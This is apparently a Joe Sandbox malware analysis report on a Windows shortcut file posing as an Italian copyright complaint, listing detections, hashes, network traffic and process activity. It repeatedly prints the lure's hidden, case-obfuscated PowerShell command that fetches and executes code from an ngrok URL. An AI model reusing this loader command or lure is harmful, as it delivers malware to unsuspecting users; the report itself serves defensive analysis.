Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk

Overview

General Information

Sample name:File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk
Analysis ID:1578153
MD5:3c56fd0e1bbabcfdeaabe5ee6e29bfa7
SHA1:1376441bc8171553125dac0415240a81859ee8f7
SHA256:0c64dd1718afa8b2cceb2727a322ddb14f595b29426c0c018a2231e61a73f6e5
Infos:

Detection

Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
AI detected suspicious sample
Machine Learning detection for sample
PowerShell case anomaly found
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication

Classification

  • System is w11x64_office
  • cmd.exe (PID: 7912 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing) MD5: 428CEC6B0034E0F183EB5BAE887BE480)
    • conhost.exe (PID: 7992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 9698384842DA735D80D278A427A229AB)
    • powershell.exe (PID: 2468 cmdline: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing) MD5: 9D8E30DAF21108092D5980C931876B7E)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7912, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ProcessId: 2468, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 724, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ProcessId: 7912, ProcessName: cmd.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7912, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ProcessId: 2468, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkVirustotal: Detection: 39%Perma Link
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkReversingLabs: Detection: 18%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.7% probability
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkJoe Sandbox ML: detected
Source: Joe Sandbox ViewIP Address: 3.6.115.182 3.6.115.182
Source: global trafficHTTP traffic detected: GET /api/secure/dbd47cba3990bb15d4c46069a75f50be HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.22621.4111Host: 5awvoe1sr8b6b5g9cfxz.ngrok.appConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /api/secure/dbd47cba3990bb15d4c46069a75f50be HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.22621.4111Host: 5awvoe1sr8b6b5g9cfxz.ngrok.appConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
Source: global trafficDNS traffic detected: DNS query: 5awvoe1sr8b6b5g9cfxz.ngrok.app
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/plainNgrok-Error-Code: ERR_NGROK_3200Date: Thu, 19 Dec 2024 09:41:27 GMTContent-Length: 67
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkString found in binary or memory: https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443

System Summary

barindex
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkLNK file: /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: classification engineClassification label: mal76.winLNK@4/3@2/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onekgyew.b3f.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkVirustotal: Detection: 39%
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkReversingLabs: Detection: 18%
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior
Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_1_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appidapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkLNK file: ..\..\..\..\Windows\System32\cmd.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
